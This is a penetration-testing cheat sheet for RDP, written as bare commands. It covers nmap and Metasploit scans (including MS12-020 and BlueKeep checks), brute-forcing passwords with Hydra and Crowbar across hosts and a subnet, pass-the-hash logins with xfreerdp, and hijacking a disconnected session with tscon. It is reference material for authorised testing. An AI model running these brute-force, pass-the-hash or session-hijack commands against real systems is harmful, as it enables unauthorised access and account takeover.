nmap -p 3389 -sV <ip>
nmap -p 3389 --script rdp-enum-encryption <ip>
nmap -p 3389 --script rdp-vuln-ms12-020 <ip>
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip>

# If NLA is required, credential prompt appears BEFORE full connection
nmap -p 3389 --script rdp-enum-encryption <ip>
# Look for: "Security layer: NLA" or "CredSSP"

# rdp_check.py (impacket) — tests credential validity
python3 rdp_check.py <domain>/<user>:<pass>@<ip>

# Hydra
hydra -l <user> -P wordlist.txt rdp://<ip>
hydra -L users.txt -P wordlist.txt rdp://<ip>
hydra -l <user> -P wordlist.txt rdp://<ip> -t 4    # Limit threads (RDP is picky)

# Crowbar
crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt
crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt

# Metasploit
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip>
run

# xfreerdp (recommended)
xfreerdp /u:<user> /p:<pass> /v:<ip>
xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain>
xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp    # Mount local dir
xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore          # Ignore cert errors
xfreerdp /u:<user> /h:<nthash> /v:<ip>                     # Pass-the-Hash

# rdesktop
rdesktop <ip>
rdesktop -u <user> -p <pass> -d <domain> <ip>

# Remmina (GUI)
remmina -c rdp://<user>@<ip>

# List sessions (on Windows target)
query session
query user

# Hijack disconnected session (as SYSTEM)
tscon <session_id> /dest:<current_session>

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run

# Custom RDP port
xfreerdp /u:<user> /p:<pass> /v:<ip>:<port>

# Enable clipboard sharing
xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard

# Full screen
xfreerdp /u:<user> /p:<pass> /v:<ip> /f

# Dynamic resolution
xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution